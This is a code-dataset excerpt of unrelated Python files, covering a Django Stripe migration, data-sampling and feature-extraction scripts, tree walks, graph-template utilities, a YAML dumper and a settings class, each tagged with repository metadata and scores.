bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model),
),
migrations.CreateModel(
name='InvoiceItem',
fields=[
('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),
('stripe_id', models.CharField(max_length=255)),
('created_at', models.DateTimeField(default=django.utils.timezone.now)),
('amount', models.DecimalField(decimal_places=2, max_digits=9)),
('currency', models.CharField(default='usd', max_length=10)),
('kind', models.CharField(blank=True, max_length=25)),
('period_start', models.DateTimeField()),
('period_end', models.DateTimeField()),
('proration', models.BooleanField(default=False)),
('line_type', models.CharField(max_length=50)),
('description', models.CharField(blank=True, max_length=200)),
('quantity', models.IntegerField(blank=True, null=True)),
('invoice', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='items', to='pinax_stripe.Invoice')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Plan',
fields=[
('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),
('stripe_id', models.CharField(max_length=191)),
('created_at', models.DateTimeField(default=django.utils.timezone.now)),
('amount', models.DecimalField(decimal_places=2, max_digits=9)),
('currency', models.CharField(max_length=15)),
('interval', models.CharField(max_length=15)),
('interval_count', models.IntegerField()),
('name', models.CharField(max_length=150)),
('statement_descriptor', models.TextField(blank=True)),
('trial_period_days', models.IntegerField(blank=True, null=True)),
('metadata', jsonfield.fields.JSONField(blank=True, null=True)),
('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Subscription',
fields=[
('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),
('stripe_id', models.CharField(max_length=191, unique=True)),
('created_at', models.DateTimeField(default=django.utils.timezone.now)),
('application_fee_percent', models.DecimalField(blank=True, decimal_places=2, default=None, max_digits=3, null=True)),
('cancel_at_period_end', models.BooleanField(default=False)),
('canceled_at', models.DateTimeField(blank=True, null=True)),
('current_period_end', models.DateTimeField(blank=True, null=True)),
('current_period_start', models.DateTimeField(blank=True, null=True)),
('ended_at', models.DateTimeField(blank=True, null=True)),
('quantity', models.IntegerField()),
('start', models.DateTimeField()),
('status', models.CharField(max_length=25)),
('trial_end', models.DateTimeField(blank=True, null=True)),
('trial_start', models.DateTimeField(blank=True, null=True)),
('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer')),
('plan', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Plan')),
],
options={
'abstract': False,
},
bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model),
),
migrations.CreateModel(
name='Transfer',
fields=[
('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),
('stripe_id', models.CharField(max_length=191, unique=True)),
('created_at', models.DateTimeField(default=django.utils.timezone.now)),
('amount', models.DecimalField(decimal_places=2, max_digits=9)),
('amount_reversed', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)),
('application_fee', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)),
('created', models.DateTimeField(blank=True, null=True)),
('currency', models.CharField(default='usd', max_length=25)),
('date', models.DateTimeField()),
('description', models.TextField(blank=True, null=True)),
('destination', models.TextField(blank=True, null=True)),
('destination_payment', models.TextField(blank=True, null=True)),
('failure_code', models.TextField(blank=True, null=True)),
('failure_message', models.TextField(blank=True, null=True)),
('livemode', models.BooleanField(default=False)),
('metadata', jsonfield.fields.JSONField(blank=True, null=True)),
('method', models.TextField(blank=True, null=True)),
('reversed', models.BooleanField(default=False)),
('source_transaction', models.TextField(blank=True, null=True)),
('source_type', models.TextField(blank=True, null=True)),
('statement_descriptor', models.TextField(blank=True, null=True)),
('status', models.CharField(max_length=25)),
('transfer_group', models.TextField(blank=True, null=True)),
('type', models.TextField(blank=True, null=True)),
('event', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='transfers', to='pinax_stripe.Event')),
('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='TransferChargeFee',
fields=[
('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),
('amount', models.DecimalField(decimal_places=2, max_digits=9)),
('currency', models.CharField(default='usd', max_length=10)),
('application', models.TextField(blank=True, null=True)),
('description', models.TextField(blank=True, null=True)),
('kind', models.CharField(max_length=150)),
('created_at', models.DateTimeField(default=django.utils.timezone.now)),
('transfer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='charge_fee_details', to='pinax_stripe.Transfer')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='UserAccount',
fields=[
('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),
('account', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to='pinax_stripe.Account')),
('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to='pinax_stripe.Customer')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to=settings.AUTH_USER_MODEL)),
],
),
migrations.AddField(
model_name='invoiceitem',
name='plan',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Plan'),
),
migrations.AddField(
model_name='invoiceitem',
name='subscription',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Subscription'),
),
migrations.AddField(
model_name='invoice',
name='subscription',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Subscription'),
),
migrations.AddField(
model_name='customer',
name='users',
field=models.ManyToManyField(related_name='customers', related_query_name='customers', through='pinax_stripe.UserAccount', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='charge',
name='customer',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='charges', to='pinax_stripe.Customer'),
),
migrations.AddField(
model_name='charge',
name='invoice',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='charges', to='pinax_stripe.Invoice'),
),
migrations.AddField(
model_name='card',
name='customer',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer'),
),
migrations.AddField(
model_name='bitcoinreceiver',
name='customer',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer'),
),
migrations.AlterUniqueTogether(
name='useraccount',
unique_together=set([('user', 'account')]),
),
migrations.AlterUniqueTogether(
name='plan',
unique_together=set([('stripe_id', 'stripe_account')]),
),
]
| 1.554688 | 2 |
src/generators/adasyn.py | Arzik1987/prelim | 2 | 12797454 | <reponame>Arzik1987/prelim
import numpy as np
from imblearn.over_sampling import ADASYN
import warnings
from src.generators.rand import Gen_randu
class Gen_adasyn:
def __init__(self):
self.X_ = None
self.mname_ = "adasyn"
def fit(self, X, y=None, metamodel=None):
self.X_ = X.copy()
return self
def sample(self, n_samples=1):
parss = 'not majority'
if self.X_.shape[0] > n_samples:
warnings.warn("The required sample size is smaller than the number of observations in train")
parss = 'all'
y = np.ones(self.X_.shape[0]), np.zeros(n_samples)
y = np.concatenate(y)
X = np.concatenate((self.X_, Gen_randu().fit(self.X_).sample(n_samples = n_samples)))
Xnew = None
parknn = min(5, n_samples, self.X_.shape[0])
# TODO Inspect
while type(Xnew) is not np.ndarray and parknn <= n_samples and parknn <= self.X_.shape[0]:
try:
Xnew, y = ADASYN(sampling_strategy = parss, n_neighbors = parknn, random_state = 2020).fit_resample(X, y)
except (ValueError, RuntimeError):
parknn = parknn * 2
if type(Xnew) is not np.ndarray:
from imblearn.over_sampling import SMOTE
parknn = min(5, n_samples, self.X_.shape[0])
Xnew, y = SMOTE(sampling_strategy = parss, k_neighbors = parknn, random_state = 2020).fit_resample(X, y)
self.mname_ = "adasyns"
else:
self.mname_ = "adasyn"
return Xnew[y == 1,:][0:n_samples,:]
def my_name(self):
return self.mname_
# =============================================================================
# # TEST
#
# from sklearn.datasets import make_classification
# X, y = make_classification(n_samples = 100, n_features = 2, n_informative = 2,
# n_redundant = 0, n_repeated = 0, n_classes = 1,
# random_state = 0)
# import matplotlib.pyplot as plt
# plt.scatter(X[:,0], X[:,1])
#
# ada_gen = Gen_adasyn()
# ada_gen.fit(X)
# df = ada_gen.sample(n_samples = 201)
# plt.scatter(df[:,0], df[:,1])
# =============================================================================
| 2.375 | 2 |
static/random_initializer.py | ajayKumar99/Dog-Breed-Classifier | 1 | 12797455 | <gh_stars>1-10
import random
def initializer():
i = random.randint(0 , 119)
while True:
j = random.randint(0 , 119)
if i != j:
break
while True:
z = random.randint(0 , 119)
if z != i and z != j:
break
k = random.randint(0 ,2)
while True:
l = random.randint(0 , 2)
if l != k:
break
while True:
m = random.randint(0 , 2)
if m != k and m != l:
break
return i , j , z , k , l , m
| 2.703125 | 3 |
result_generator/result_feature_db/index_sift_color.py | shijack/feature_extract | 1 | 12797456 | # coding=utf-8
import os
import shutil
import time
def get_dirs_child(path):
return [os.path.join(path, f) for f in os.listdir(path)]
def get_all_files_suffix(path, file_suffix='.jpg'):
all_file = []
for dirpath, dirnames, filenames in os.walk(path):
for name in filenames:
if name.endswith(file_suffix):
all_file.append(os.path.join(dirpath, name))
return all_file
def copyFiles(file_imgs, targetDir):
list_imgs = []
with open(file_imgs, 'r') as f:
list_imgs_tmp = f.readlines()
for item_img in list_imgs_tmp:
list_imgs.append(
item_img.split(' ')[0].replace('/opt/Datasets/Datasets/ccweb_video/dataset_ccweb/trans_imgs',
'/Data/Datasets/ccweb_video/dataset_ccweb/trans_imgs').strip())
if not os.path.exists(targetDir):
os.makedirs(targetDir)
for eachfile in list_imgs:
if not os.path.exists(eachfile):
print "src path not exist:" + eachfile
print "error!! attation!"
return -1
shutil.copy(eachfile, targetDir + os.path.basename(eachfile))
print eachfile + " copy succeeded!"
cmd = '/usr/local/bin/videofpget_bow_hash /opt/dongsl/keyframe/10732a0e6a0edef9dcbb2155236e46a7ed5047c0/ 1 4 /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin /opt/a.bow /opt/dongsl/a.hash'
'/usr/local/bin/videofpget_bow_hash /opt/dongsl/trans_imgs/add_text 1 26069 /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin /opt/dongsl/t.bow /opt/dongsl/t.hash'
def feature_generator_sift_color(dir_img):
dir_child_list = get_dirs_child(dir_img)
print "--------------------------------------------------"
print " feature extraction starts"
print "--------------------------------------------------"
start_time = time.time()
for i, img_path in enumerate(dir_child_list):
names = []
img_names = get_all_files_suffix(img_path)
for j, item_name in enumerate(img_names):
names.append(item_name)
newname = os.path.dirname(item_name) + '/%05d' % (j + 1)
os.rename(item_name, newname + ".jpg")
img_names = get_all_files_suffix(img_path)
print len(img_names)
fp_pick = '/usr/local/bin/videofpget_bow_hash ' + img_path + '/ 1 ' + str(len(
img_names)) + ' /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin ' + os.path.dirname(
img_path) + '/' + img_path.split('/')[-1] + '.bow ' + os.path.dirname(img_path) + '/' + img_path.split('/')[
-1] + '.hash'
os.system(fp_pick)
with open(os.path.dirname(img_path) + '/' + img_path.split('/')[-1] + '_img_names.txt', 'w') as name_file:
name_file.writelines(names)
print "extracting feature from image No. %d , %d dirs in total" % ((i + 1), len(dir_child_list))
end_time = time.time()
print ("final_feature extract time:", (end_time - start_time))
print "--------------------------------------------------"
print " feature extraction ends ..."
print "--------------------------------------------------"
def feature_generator_query(target_dir):
'''
根据图片文件列表,获取线上系统 查询视频帧 .bow .hash .txt 信息
:param target_dir: endswith /
:return:
'''
copyFiles('./test_2000.txt', target_dir)
feature_generator_sift_color(dir_img=os.path.abspath(os.path.join(os.path.dirname(target_dir), '../')))
if __name__ == "__main__":
query_dir_imgs = '/opt/dongsl/tmp2/tmp/'
feature_generator_query(query_dir_imgs)
| 2.78125 | 3 |
tree-walk.py | rabindra-harlalka/my-programs | 0 | 12797457 | from typing import Callable
from queue import Queue
"""A type of depth-first walk of a tree (parent, left, right)"""
def pre_order_walk(node, result: list, left: Callable, right: Callable, parent: Callable):
if node is not None:
result.append(node)
if left(node) is not None:
pre_order_walk(left(node), result, left, right, parent)
if right(node) is not None:
pre_order_walk(right(node), result, left, right, parent)
"""A type of depth-first walk of a tree (left, parent, right)"""
def in_order_walk(node, result: list, left: Callable, right: Callable, parent: Callable):
if node is not None:
if left(node) is not None:
in_order_walk(left(node), result, left, right, parent)
result.append(node)
if right(node) is not None:
in_order_walk(right(node), result, left, right, parent)
"""A type of depth-first walk of a tree (left, right, parent)"""
def post_order_walk(node, result: list, left: Callable, right: Callable, parent: Callable):
if node is not None:
if left(node) is not None:
post_order_walk(left(node), result, left, right, parent)
if right(node) is not None:
post_order_walk(right(node), result, left, right, parent)
result.append(node)
def add_child(node, child_node):
if not "left" in node:
node["left"] = child_node
child_node["parent"] = node
elif not "right" in node:
node["right"] = child_node
child_node["parent"] = node
else:
raise Exception("parent node is full")
def is_full(node) -> bool:
return "left" in node and "right" in node
def make_node(data):
node = { "data" : data }
return node
def make_tree(items: list):
tree = []
q = Queue()
current_parent = q.get(block=False) if q.empty() is False else None
for item in items:
print('DEBUG: adding item %s' % item)
node = make_node(item)
q.put(node)
tree.append(node)
if current_parent is not None:
if (is_full(current_parent)):
current_parent = q.get(block=False)
add_child(current_parent, node)
else:
current_parent = q.get(block=False)
return tree
def print_tree(tree: list):
for node in tree:
parent = node["parent"]["data"] if "parent" in node else None
left = node["left"]["data"] if "left" in node else None
right = node["right"]["data"] if "right" in node else None
print("%s <- %s: %s %s" % (parent, node["data"], left, right))
def print_tree_minimal(tree: list):
for node in tree:
print("%s" % node["data"], end=' ')
print()
def main():
tree = make_tree([25, 23, 22, 21, 12, 20, 17, 15, 16, 10, 9, 19, 18, 14, 7, 4, 13, 11])
print_tree(tree)
pre_order_walk_result = []
pre_order_walk(tree[0], pre_order_walk_result,
left=lambda node: node["left"] if "left" in node else None,
right=lambda node: node["right"] if "right" in node else None,
parent=lambda node: node["parent"] if "parent" in node else None)
print_tree_minimal(pre_order_walk_result)
in_order_walk_result = []
in_order_walk(tree[0], in_order_walk_result,
left=lambda node: node["left"] if "left" in node else None,
right=lambda node: node["right"] if "right" in node else None,
parent=lambda node: node["parent"] if "parent" in node else None)
print_tree_minimal(in_order_walk_result)
post_order_walk_result = []
post_order_walk(tree[0], post_order_walk_result,
left=lambda node: node["left"] if "left" in node else None,
right=lambda node: node["right"] if "right" in node else None,
parent=lambda node: node["parent"] if "parent" in node else None)
print_tree_minimal(post_order_walk_result)
main()
| 3.984375 | 4 |
polymath/srdfg/templates/template_utils.py | lite-david/polymath | 15 | 12797458 | <reponame>lite-david/polymath
import polymath as pm
import numpy as np
def format_idx(x, reverse=True):
if reverse:
return tuple(list(reversed(x)))
else:
return tuple(x)
def _get_indices(node, all_indices, tgt_shape):
indices = []
if node.shape == pm.DEFAULT_SHAPES[0]:
return tuple(indices)
for idx, i in enumerate(all_indices):
if len(node.shape) > idx and tgt_shape[idx] == node.shape[idx]:
indices.append(i)
if tgt_shape != node.shape:
for idx, i in enumerate(node.shape):
if i != tgt_shape[idx]:
indices.insert(idx, 0)
return tuple(indices)
def _get_binop_idx(node_a, node_b, out_node):
# TODO: Figure out what to do about multiple dimensions with the same value
cnt = 0
op1 = []
op2 = []
all_ops = []
for i in node_a.shape:
if i == 1:
op1.append(0)
# all_ops.append(0)
else:
idx = pm.index(0, i - 1)
op1.append(idx)
all_ops.append(idx)
cnt += 1
for i in node_b.shape:
if i in node_a.shape:
idx = node_a.shape.index(i)
op2.append(op1[idx])
elif i == 1:
op2.append(0)
# all_ops.append(0)
else:
idx = pm.index(0, i - 1)
op2.append(idx)
all_ops.append(idx)
cnt += 1
if out_node.is_shape_finalized():
all_ops = []
for s in out_node.shape:
if s in node_a.shape:
idx = node_a.shape.index(s)
all_ops.append(idx)
else:
assert s in node_b.shape, f"Output shape value {s} not in other shapes"
idx = node_b.shape.index(s)
all_ops.append(idx)
return op1, op2, all_ops
def _get_single_node_indices(node, shape=None):
if node.shape == pm.DEFAULT_SHAPES[0]:
return tuple([])
else:
if not shape:
shape = node.shape
indices = tuple([pm.index(0, s - 1) for s in shape])
return indices
def _get_reduce_node_indices(a, b, output, axis):
if output.shape == pm.DEFAULT_SHAPES[0]:
return tuple([])
else:
if not output.shape:
raise RuntimeError
indices = tuple([pm.index(0, s - 1) for s in output.shape])
return indices
def is_broadcastable(shp1, shp2):
for a, b in zip(shp1[::-1], shp2[::-1]):
if a == 1 or b == 1 or a == b:
pass
else:
return False
return True
# Use numpy broadcasting rules
def _get_elem_indices(node_a, node_b, node_c, zero_indices=True):
broadcastable = is_broadcastable(node_a.shape, node_b.shape)
a_idx = []
b_idx = []
out_idx = []
nmap = {}
reverse = True
if not broadcastable:
reverse = False
a_idx = [None] * len(node_a.shape)
b_idx = [None] * len(node_b.shape)
a_map = {}
b_map = {}
for s in node_c.shape:
idx = pm.index(0, s - 1)
out_idx.append(idx)
if s in node_a.shape:
start = 0
if s in a_map:
start = a_map[s]
sidx = node_a.shape.index(s, start)
a_idx[sidx] = idx
a_map[s] = sidx
if s in node_b.shape:
start = 0
if s in b_map:
start = b_map[s]
sidx = node_b.shape.index(s, start)
b_idx[sidx] = idx
b_map[s] = sidx
for i in range(len(a_idx)):
if a_idx[i] is None:
assert node_a.shape[i] == 1
a_idx[i] = 0
for i in range(len(b_idx)):
if b_idx[i] is None:
assert node_b.shape[i] == 1
b_idx[i] = 0
else:
if node_a.shape == node_b.shape and node_c.shape == node_a.shape:
indices = _get_single_node_indices(node_a)
return indices, indices, indices
elif node_a.shape == pm.DEFAULT_SHAPES[0] and node_b.shape == pm.DEFAULT_SHAPES[0]:
idx = format_idx([])
return idx, idx, idx
elif node_a.shape == pm.DEFAULT_SHAPES[0]:
idx = format_idx([])
indices = _get_single_node_indices(node_b)
return idx, indices, indices
elif node_b.shape == pm.DEFAULT_SHAPES[0]:
idx = format_idx([])
indices = _get_single_node_indices(node_a)
return indices, idx, indices
if len(node_a.shape) > len(node_b.shape):
small_node = node_b
lg_node = node_a
nmap["small"] = b_idx
nmap["large"] = a_idx
else:
small_node = node_a
lg_node = node_b
nmap["small"] = a_idx
nmap["large"] = b_idx
for i in range(-1, -len(lg_node.shape) - 1, -1):
if len(small_node.shape) < abs(i):
idx = pm.index(0, lg_node.shape[i] - 1)
nmap["large"].append(idx)
out_idx.append(idx)
elif node_a.shape[i] == node_b.shape[i]:
if node_a.shape[i] != 1:
idx = pm.index(0, node_a.shape[i] - 1)
a_idx.append(idx)
b_idx.append(idx)
out_idx.append(idx)
elif node_a.shape[i] == 1:
idx = pm.index(0, node_b.shape[i] - 1)
if zero_indices:
a_idx.append(0) # TESTING
b_idx.append(idx)
out_idx.append(idx)
elif node_b.shape[i] == 1:
idx = pm.index(0, node_a.shape[i] - 1)
a_idx.append(idx)
if zero_indices:
b_idx.append(0) # TESTING
out_idx.append(idx)
else:
raise RuntimeError(f"Unable to broadcast indices:\n"
f"{node_a.name}: {node_a.shape}\n"
f"{node_b.name}: {node_b.shape}\n")
return format_idx(a_idx, reverse), format_idx(b_idx, reverse), format_idx(out_idx, reverse)
def dilate(var: pm.placeholder, strides, name=None):
n = len(var.shape)
assert len(strides) == n
out_shape = ()
nz_indices = ()
shape_idx = ()
for i in range(n):
out_shape += ((var.shape[i] - 1) * strides[i] + 1,)
nz_indices += (pm.index(0, out_shape[i] - 1, stride=strides[i]),)
shape_idx += (pm.index(0, out_shape[i] - 1),)
padded = pm.temp(name=name, shape=out_shape)
padded[shape_idx] = 0
padded[(shape_idx[0])] = 0
# def get_pad_tuple(pad_size):
# if isinstance(pad_size, (tuple, list)):
# if len(pad_size) == 2:
# pad_h = pad_size[0] * 2
# pad_w = pad_size[1] * 2
# elif len(pad_size) == 4:
# return pad_size[0], pad_size[2], pad_size[1], pad_size[3]
# else:
# raise ValueError("Size of padding can only be 2 or 4")
# else:
# assert isinstance(pad_size, int)
# pad_h = pad_w = pad_size * 2
#
# pad_top = (pad_h + 1) // 2
# pad_left = (pad_w + 1) // 2
# return pad_top, pad_left, pad_h - pad_top, pad_w - pad_left
def get_pad_tuple(padding, kernel):
"""Common code to get the pad option
Parameters
----------
padding : int or str
Padding size, or ['VALID', 'SAME']
kernel : tuple of int
Conv kernel size
Returns
-------
pad_top : int
Padding size on top
pad_left : int
Padding size on left
pad_down : int
Padding size on down.
pad_right : int
Padding size on right.
"""
# pad_h = pad_w = padding * 2
pad_h = padding[0] * 2
pad_w = padding[1] * 2
pad_top = (pad_h + 1) // 2
pad_left = (pad_w + 1) // 2
return pad_top, pad_left, pad_h - pad_top, pad_w - pad_left
def pad_node(data: pm.Node, padded_out: pm.Node, pad_size, kernel, pad_val=0):
assert len(data.shape) == 4
p_top, p_bottom, p_left, p_right = get_pad_tuple(pad_size, kernel)
oh = data.shape[2] + p_top + p_bottom
ow = data.shape[3] + p_left + p_right
padded_shape = (data.shape[0], data.shape[1], oh, ow)
if padded_out.is_shape_finalized() and padded_out.shape != (1,):
assert padded_shape == padded_out.shape, f"Unequal shapes for padding:\n" \
f"Target shape: {padded_shape}\n" \
f"Set shape: {padded_out.shape}"
padded_out.set_shape(padded_shape)
n_idx = pm.index(0, data.shape[0]-1)
c_idx = pm.index(0, data.shape[1]-1)
oh_idx = pm.index(0, oh-1)
ih_idx = pm.index(0, data.shape[2]-1)
ow_idx = pm.index(0, ow-1)
iw_idx = pm.index(0, data.shape[3] - 1)
padded_out[(n_idx, c_idx, oh_idx, ow_idx)] = pad_val
padded_out[(n_idx, c_idx, ih_idx + p_top, iw_idx + p_left)] = data[(n_idx, c_idx, ih_idx, iw_idx)]
return padded_out
def reshape_node(data: pm.Node, reshaped_out: pm.Node, shape: tuple, dim_combinations):
assert np.prod(data.shape) == np.prod(shape)
assert len(dim_combinations) == len(shape)
src_indices = []
dst_indices = []
for s in data.shape:
idx = pm.index(0, s-1)
src_indices.append(idx)
# STEP 0: idx3*1 + 0
# STEP 1: idx3 + shape[3]*
for dc in reversed(dim_combinations):
idx = 0
idx_offset = 1
add_dim = 0
for d in reversed(dc):
idx = src_indices[d]*idx_offset + add_dim
idx_offset = data.shape[d]
def _get_indices_for_dim(x, dim):
assert len(x.shape) < dim
idx = pm.index(0, x.shape[dim] - 1)
return idx
def _dim_explicit(a_shp, dim):
if dim is None:
return dim
if dim < 0:
dim = len(a_shp) + dim
return dim
def _get_conv_shape_1axis(
image_shape, kernel_shape, border_mode, subsample, dilation=1
):
"""This function compute the output shape of convolution operation.
Copied and simplified from theano (2020/11/08):
https://github.com/Theano/Theano/blob/master/theano/tensor/nnet/abstract_conv.py
Parameters
----------
image_shape: int
Corresponds to the input image shape on a given axis.
kernel_shape: int
Corresponds to the kernel shape on a given axis.
border_mode: string or int. If it is a string, it must be
'valid' or 'full'.
subsample: int. It must correspond to the subsampling on the
considered axis.
dilation: int. It must correspond to the dilation on the
considered axis.
Returns
-------
out_shp: int corresponding to the output image shape on the
considered axis.
"""
# Implicit dilated kernel shape
dil_kernel_shape = (kernel_shape - 1) * dilation + 1
if border_mode == "full":
pad_l = pad_r = dil_kernel_shape - 1
elif border_mode == "valid":
pad_l = pad_r = 0
else:
assert border_mode >= 0
pad_l = pad_r = border_mode
# In case of symbolic shape, we want to build the smallest graph
# (image_shape + 2 * pad - dil_kernel_shape) // subsample + 1
out_shp = image_shape - dil_kernel_shape
if pad_l != 0:
out_shp += pad_l
if pad_r != 0:
out_shp += pad_r
if subsample != 1:
out_shp = out_shp // subsample
out_shp = out_shp + 1
return out_shp
def _get_conv_output_shape(
image_shape, kernel_shape, border_mode, subsample, filter_dilation=(0, 0)
):
"""This function compute the output shape of convolution operation.
Copied and simplified from Theano (2020/11/08):
https://github.com/Theano/Theano/blob/master/theano/tensor/nnet/abstract_conv.py
Parameters
----------
image_shape: tuple of int corresponding to the input
image shape. Its four (or five) element must correspond respectively
to: batch size, number of input channels, height and width (and
possibly depth) of the image. None where undefined.
kernel_shape: tuple of int corresponding to the
kernel shape. For a normal convolution, its four (for 2D convolution)
or five (for 3D convolution) elements must correspond respectively to :
number of output channels, number of input channels, height and width
(and possibly depth) of the kernel.
For an unshared 2D convolution, its six channels must correspond to :
number of output channels, height and width of the output, number of
input channels, height and width of the kernel.
None where undefined.
border_mode: string, or tuple of int. If it is a string, it must be 'valid'
or 'full'. If it is a tuple, its two (or three) elements respectively
correspond to the padding on height and width (and possibly depth)
axis.
subsample: tuple of int. Its two or three elements
respectively correspond to the subsampling on height and width (and
possibly depth) axis.
filter_dilation: tuple of int. Its two or three
elements correspond respectively to the dilation on height and width axis.
Returns
-------
output_shape: tuple of int corresponding to the output image shape. Its
four element must correspond respectively to: batch size, number of
output channels, height and width of the image.
"""
bsize, imshp = image_shape[0], image_shape[2:]
convdim = len(image_shape) - 2
nkern, kshp = kernel_shape[0], kernel_shape[-convdim:]
if isinstance(border_mode, tuple):
out_shp = tuple(
_get_conv_shape_1axis(
imshp[i],
kshp[i],
border_mode[i],
subsample[i],
filter_dilation[i],
)
for i in range(len(subsample))
)
else:
out_shp = tuple(
_get_conv_shape_1axis(
imshp[i], kshp[i], border_mode, subsample[i], filter_dilation[i]
)
for i in range(len(subsample))
)
return (bsize, nkern) + out_shp | 2.65625 | 3 |
src/my_tools/second_module.py | hyeonukbhin/template_repository | 0 | 12797459 | #!/usr/bin/python3.5
# -*- coding: utf-8 -*-
import os
import sys
EXE_PATH = os.getcwd() # 실행 경로
SCRIPT_PATH = os.path.dirname(os.path.abspath(__file__)) # 스크립트 경로
UPPER_PATH = os.path.dirname(os.path.abspath(os.path.dirname(__file__))) # 상위 경로
sys.path.append(UPPER_PATH) # 상위 경로를 추가
from my_tools import first_module # Upper directory 에서 Lower directory 참조
def function_2():
print("function_2 of second module imported")
def call_function_in_first_module():
print("called from second module to first module")
first_module.function_1()
if __name__ == "__main__":
function_2()
call_function_in_first_module()
| 2.96875 | 3 |
vagga2lithos/lithos.py | tailhook/vagga2lithos | 5 | 12797460 | <gh_stars>1-10
import yaml
try:
from yaml import CSafeDumper as BaseDumper
from yaml import CSafeLoader as BaseLoader
except ImportError:
from yaml import SafeDumper as BaseDumper
from yaml import SafeLoader as BaseLoader
class Dumper(BaseDumper):
def statedir_repr(self, value):
return self.represent_mapping('!Statedir', value.__dict__)
def toplevel_repr(self, value):
return self.represent_mapping('tag:yaml.org,2002:map',
value.format(), flow_style=False)
def list_repr(self, value):
return self.represent_sequence('tag:yaml.org,2002:seq',
value, flow_style=False)
def map_repr(self, value):
return self.represent_mapping('tag:yaml.org,2002:map',
sorted((k, Quoted(v)) for k, v in value.items()),
flow_style=False)
def tag_map_repr(self, value):
return self.represent_mapping('!' + value.__class__.__name__,
value.__dict__)
def quoted_repr(self, value):
return self.represent_scalar('tag:yaml.org,2002:str',
str(value), style='"')
class Loader(BaseLoader):
pass
class Statedir(object):
pass
# Formatting
class List(list): pass
class Map(dict): pass
class Quoted(str): pass
class Toplevel(dict):
def format(self):
x = self.copy()
yield 'kind', x.pop('kind')
yield 'user-id', x.pop('user-id')
yield 'group-id', x.pop('group-id')
yield 'environ', Map(x.pop('environ'))
yield 'memory-limit', x.pop('memory-limit')
yield 'fileno-limit', x.pop('fileno-limit')
yield 'cpu-shares', x.pop('cpu-shares')
yield 'workdir', x.pop('workdir', '/')
yield 'executable', x.pop('executable')
yield 'arguments', List(map(Quoted, x.pop('arguments')))
for k, v in x.items():
yield k, v
yaml.add_representer(Statedir, Dumper.statedir_repr, Dumper=Dumper)
yaml.add_representer(Toplevel, Dumper.toplevel_repr, Dumper=Dumper)
yaml.add_representer(List, Dumper.list_repr, Dumper=Dumper)
yaml.add_representer(Map, Dumper.map_repr, Dumper=Dumper)
yaml.add_representer(Quoted, Dumper.quoted_repr, Dumper=Dumper)
def unknown_type(loader, tag, node):
if isinstance(node, yaml.MappingNode):
typ = type(tag, (object,), {
'__init__': lambda self, **kwargs: self.__dict__.update(kwargs),
'__eq__': lambda self, other: self.__dict__ == other.__dict__,
})
yaml.add_representer(typ, Dumper.tag_map_repr, Dumper=Dumper)
return typ(**loader.construct_mapping(node))
elif isinstance(node, yaml.SequenceNode):
typ = type(tag, (list,), {})
return typ(loader.construct_sequence(node))
elif isinstance(node, yaml.ScalarNode):
typ = type(tag, (str,), {})
return typ(loader.construct_scalar(node))
else:
raise NotImplementedError(node)
yaml.add_multi_constructor("!", unknown_type, Loader=Loader)
def dump(data, file=None):
return yaml.dump(Toplevel(data), file, Dumper=Dumper)
def read(filename):
with open(str(filename)) as f:
return yaml.load(f, Loader=Loader)
| 2.25 | 2 |
src/vispy_radar_scenes/settings.py | henriksod/vispy_radar_scenes | 2 | 12797461 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Settings dataclass. Holds settings for the visualization tool during runtime.
"""
from dataclasses import dataclass
@dataclass
class Settings:
program_title: str = "Radar Data Viewer"
dark_mode: bool = True
dark_stylesheet: str = ":/dark/stylesheet.qss"
light_stylesheet: str = ":/light/stylesheet.qss"
canvas_light_mode_clear_color: tuple = (0.05, 0.05, 0.08, 1.0)
canvas_dark_mode_clear_color: tuple = (0.05, 0.05, 0.08, 1.0)
